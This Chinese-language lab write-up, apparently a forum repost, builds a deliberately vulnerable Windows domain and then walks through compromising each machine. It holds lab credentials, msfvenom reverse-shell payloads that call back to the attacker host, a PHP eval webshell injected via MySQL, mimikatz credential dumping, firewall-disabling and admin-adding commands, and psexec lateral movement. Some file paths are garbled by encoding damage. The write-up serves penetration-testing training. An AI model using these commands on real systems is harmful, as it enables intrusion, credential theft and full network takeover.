0x01 实验拓扑图及实验用IP

A组IP(实验用IP)

1号

账号：Administrator

密码：Jack@!@#

ip：192.168.141.111

2号

账号：ADMIN-PC/ADMIN

密码：123456hhhh.

222.18.158.244:7771

ip：192.168.141.138

3号

域名：hiro.com

管理员

账号：hiroadministrator

密码：hb123456,./$

域用户

账号：hiro.com/user1

密码：hb123456,./$

ip：192.168.141.100

Tips

里面设了静态ip 要改一下

已将加入过程总结

4号

账号:administrator

密码:Win@2003

ip：192.168.141.114

5号

账号：Administrator

密码：Win@2008

ip：192.168.141.115

6号

账号：Administrator

密码：Edvison233!

ip：192.168.141.116

---

0x02 环境搭建步骤

本模块中的IP只是作为范例,与正式实验中所用IP不同

一号机

系统：Windows 10

IP : 192.168.199.101

对三号机192.168.199.103开放445端口

配置步骤：

1. 在虚拟机上安装win10系统
2. 在网络共享中心配置静态IP

1. 对3号机开放445端口：
2. 新建入站规则(选择自定义)

应用于所有程序：

设置端口：

指定只对3号机开放：

---

二号机

系统：Windows 7

IP : 192.168.199.102

配置步骤：

安装Windows7，设置固定IP

---

三号机

系统：Windows 2012

IP : 192.168.199.103

对192.168.199.104开放445端口

配置步骤：

Windows server 2012 搭建域环境

计算机名：WIN-MT3C3TD4RQD.1.org

所在域名或工作组名称：1.org

IP地址：192.168.199.103

操作系统：Windows Server 2012 R2

密码 hb,./123456

安装步骤

1) 指定AD角色服务器的IP地址(这里的IP地址根据企业实际情况分配，但一定要是固定IP)

2) 点击Server2012左下角的“服务器管理器”显示如下界面

3) 点击“添加角色和功能按钮”弹出如下界面

4) 点击“下一步”

5) 这里选择”基于角色或基于功能的安装”，然后点”下一步”

6) 服务器选择这里选择默认的，假如你需要针对其它主机安装AD角色，这里可以选择你需要的主机，点击”下一步”

7) 这里勾选“Active Directory域服务”，当勾选这个选项时，会弹出如下对话框，点“添加功能”就OK

8) 这样就正确选择了安装AD角色，点击”下一步”

9) 功能页面不需要做任何选择直接点“下一步”

10) 这里是介绍AD角色的功能及注意事项，点击“下一步”

11) 勾选”如果需要，自动重新启动目标服务器”，然后点击”安装”

12) 安装成功后我们点击“关闭”，但这还没有完全安装成功

13) 点击服务器右上角的“功能按钮”

14) 弹出继续配置AD的对话框

15) 点击”部署后配置”，在红框处填入相应的域名

16) 点击“下一步”，红色方框选择域功能级别，绿色方框选择相应的功能，DNS/GC/RODC,黄色方框输入目录服务还原密码 密码是 hb,./123456

17) 点击“下一步”后配置DNS，由于不需要委派DNS，所以这里不需要设置，直接点击”下一步”

18) 这一步配置Netbios名，若没有特殊需求默认的就可以，直接点”下一步”

19) 配置日志，数据库，sysvol路径，若没有特殊需求，默认就可以

20) 查看配置信息，若没有任何问题直接点”下一步”

21) 这个页面是检测是否满足条件，满足条件后就可以直接点”安装”

22) 等待机器安装配置项，可能需要重启

23) 重启后我们会看到AD角色已经安装完成

验证安装

1. 直接打开CMD命令行，输入”Net query fsmo”,这时会显示五种角色都已经安装成功

1. 若要进一步验证AD是否安装正确，可以使用DCDIAG /a命令行

设置端口开放：

打开电脑找到控制面板，点击控制面板进入控制面板页面，点击系统和安全选项

进入系统安全页面，点击防火墙选项

进入windows防火墙面板，点击高级设置选项

进入高级设置选项，点击右键新建规则

进入规则想到页面，选择端口，点击下一步

进入设置端口页面，设置需要开放的445端口，点击下一步

选择允许链接，点击下一步

配置文件项，点击下一步

输入名称和描述，点击完成

---

四号机

系统：Windows 2003

本机密码为空

IP : 192.168.199.104

对192.168.199.105开放445端口

留Ms17010漏洞

配置步骤：

静态ip配置

设置本机管理员密码为空

防火墙配置

攻击实例

攻击机: kail ip：192.168.246.128 (在本机验证时没有使用192.168.199.1xx的IP地址)

靶机: win 2003 ip：192.168.246.141

配置靶机只对攻击机开放445端口：

先启用防火墙：

然后编辑445端口

点击更改范围，再将攻击机的ip添加上去，这样就配好了。

配置ms17_010漏洞

因为win server 2003 在未打补丁时都有ms17_010漏洞，所以我直接展示利用过程。

利用msf进行攻击

获得shell

---

五号机

系统：Windows server 2008

IP : 192.168.199.105

对192.168.199.106开放80端口

安装PHP study ，MySQL弱口令

1、首先完成本机phpstudy及MySQL的安装

2、配置本机的静态IP为192.168.199.105

3、配置防火墙对六号机开放80端口

在命令行中使用wf.msc打开防火墙高级设置

在入站规则里添加新的规则，设置端口80

在新添加的规则右键属性

在作用域里添加本地IP地址为192.168.199.106，即六号机的IP

---

六号机

系统：Windows server 2008

IP : 192.168.199.106

对192.168.199.102开放1433端口

Sa账号为弱口令

本机是六号机

操作系统是 windows server 2008

Ip是 192.168.199.106

要求是配置一个sqlserver sa为弱口令的机器

对2号开放1433端口

首先，配置sqlserver

下载SQL Server安装程序

双击运行下载的SQL Server安装程序SQLEXPRWT_x64_CHS.exe。

打开SQLServer安装中心，在右边选择“全新安装或向现有安装添加功能”。

SQL Server开始安装准备。一直下一步。

在“数据库引擎配置”中，选择“混合模式”，并为“SQLServer系统管理员账户(sa)”指定密码，这里设置为弱口令

一直下一步 直到安装成功。

然后设置对二号机开放1433端口

第1步选择“打开或者关闭windows防火墙”把防火墙打开，然后选择“高级设置”，选择“创建规则”来指定端口。

现在“创建规则”，选择“端口”下--“TCP”和“特定本地端口”然后填写“1433”--下一步--下一步--为这个端口添加一个名称“1433”，然后确定就可以了。/3、在“入站规则”里选择刚才创建的规则，名称是“1433”，然后按照下图顺序就可以了。

配置成功

---

以下为内网渗透测试过程

0x03 使用kali拿下二号机

通过MobaXterm连接Kali Linux(ip:192.168.141.143)，用户名:root，密码:toor

使用下述命令，执行，生成木马文件:

msf -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe

生成了test.exe之后，然后在kali里，设定端口监听，等待目标上线

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"

在2号机上右击，以管理员权限执行。kali就可以接收到反弹回来的shell。对shell进行操作。

在kali里接收到了shell，可在meterpreter中管理shell，开启3389

在kali里接收到了shell，可在meterpreter中管理shell，开启3389

run post/windows/manage/enable_rdp

添加用户

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

然后在服务器主机中，用新添加的账号，远程桌面连接2号机，至此完成了对2号机的控制

2号机到6号机

使用nmap扫描发现192.168.141.116开了1433端口

nmap -p1433 --open 192.168.141.0/24

使用ms-sql-brute模块对6号机sa账户进行爆破，获得用户名为sa，密码为123456

nmap -p 1433 --script ms-sql-brute --script-args userdb=C:甥敳獲Waldo1111testDesktopame.txt,passdb=C:甥敳獲Waldo1111testDesktoppassword.txt 192.168.141.116

使用sqltools获取6号机数据库

用xp_cmdshell关闭防火墙限制

netsh firewall set opmode mode=disable

添加3389入站规则

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

创建管理员用户Waldo6TEST

net user Waldo6TEST 1234567hhhh. /addnet localgroup administrators Waldo6TEST /add

使用用户名Wado6TEST 密码1234567hhhh.成功登陆六号机

6号机到5号机

发现5号机开放80端口

输入://192.168.141.115/phpmyadmin/，弱口令 用户名root 密码root

尝试写入webshell

use mysql;CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';

Shell写到了：http://192.168.141.115/shell.php

使用菜刀连接

执行命令whoami，发现是administrator权限

加管理员用户

net user Waldo 1234567hhhh. /addnet localgroup administrators Waldo /add

打开5号机3389端口:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

连接到远程桌面

5号机到4号机

在5号机上传ms17010攻击脚本，用kali攻击机生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe

开启msf监听

msfconsole -quse exploit/multi/handlerset lhost 0.0.0.0set lport 6666exploit

在5号机中cmd中C:甥敳獲WaldoMS17-010-master

在5号机上，运行ms170101攻击脚本(脚本要自己下载)

python zzz_exploit.py 192.168.141.114

在kali里接收到了shell，可在meterpreter中管理shell，开启3389

run post/windows/manage/enable_rdp

添加用户

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在5号机远程登录4号机

4号机到3号机

在4号机中抓取hash

privilege::debugsekurlsa::logonpasswords

抓到域控管理员账号和密码:

在4号机上，使用以下命令建立IPC$连接

net use 192.168.141.100 "hb123456,./$" /user:"Administrator"

在4号机上，使用以下命令，将目标靶机的C盘映射到本地Z盘

net use z: 192.168.141.100c$

使用copy命令将先前生成的shell.exe拷贝至靶机C盘

copy shell.exe 192.168.141.100c$

在kali上开启监听(6666端口)，使用psesec.exe.启动靶机上的shell.exe

p**ec.exe 192.168.141.100 -u administrator -p hb123456,./$ c:shell.exe

成功反弹shell上线:

在kali里接收到了shell，可在meterpreter中管理shell，开启3389

run post/windows/manage/enable_rdp

添加用户

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在4号机远程登录3号机

用户名:hiroAdministrator 密码:hb123456,./$

3号机到1号机

在3号机上，使用以下命令建立IPC$连接

net use 192.168.141.111 "hb123456,./$" /user:"Administrator"

在3号机上，使用以下命令，将目标靶机的C盘映射到本地Z盘

net use z: 192.168.141.111c$

使用copy命令将先前生成的shell.exe拷贝至靶机C盘

copy shell.exe 192.168.141.111c$

在kali上开启监听(6666端口)，使用p**ec.exe.启动靶机上的shell.exe

p**ec.exe 192.168.141.111 -u hiroAdministrator -p hb123456,./$ c:shell.exe

成功获取shell

打开一号机3389

使用用户名:hiroAdministrator 密码: hb123456,./$登录

成功拿下一号机，实验成功!

转载自：https://bbs.ichunqiu.com/thread-49988-1-1.html